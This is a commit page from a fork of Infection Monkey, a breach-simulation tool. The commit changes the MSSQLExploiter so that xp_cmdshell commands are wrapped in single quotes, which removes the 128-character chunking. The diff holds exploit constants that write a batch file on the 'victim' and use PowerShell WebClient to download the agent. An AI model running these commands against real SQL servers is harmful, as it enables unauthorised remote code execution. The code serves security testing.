p59342861
/
monkey
forked from p15670423/monkey
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Agent: Use single quotes to avoid 128 character limit 

The logic that splits up commands into 128 character chunks in
MSSQLExploiter is flawed, which results in malformed commands being
written to a batch file on the victim. By using single quotes instead of
double quotes, the 128 character limit is circumvented and there's no
longer any need to break up the commands. See #2018 for more details.

Fixes #2018
This commit is contained in:
Mike Salvatore 2022-06-14 11:18:00 -04:00
parent 6db63d3c69
commit ef63f2699b
1 changed files with 4 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
monkey/infection_monkey/exploit/mssqlexec.py
View File

@ -33,16 +33,16 @@ class MSSQLExploiter(HostExploiter):
TMP_FILE_NAME = "tmp_monkey.bat"
TMP_DIR_PATH = "%temp%\\tmp_monkey_dir"
MAX_XP_CMDSHELL_COMMAND_SIZE = 128
MAX_XP_CMDSHELL_COMMAND_SIZE = 12800
XP_CMDSHELL_COMMAND_START = 'xp_cmdshell "'
XP_CMDSHELL_COMMAND_END = '"'
XP_CMDSHELL_COMMAND_START = "xp_cmdshell '"
XP_CMDSHELL_COMMAND_END = "'"
EXPLOIT_COMMAND_PREFIX = "<nul set /p="
EXPLOIT_COMMAND_SUFFIX = ">>{payload_file_path}"
CREATE_COMMAND_SUFFIX = ">{payload_file_path}"
MONKEY_DOWNLOAD_COMMAND = (
"powershell (new-object System.Net.WebClient)."
"DownloadFile(^'{http_path}^' , ^'{dst_path}^')"
"DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')"
)
def __init__(self):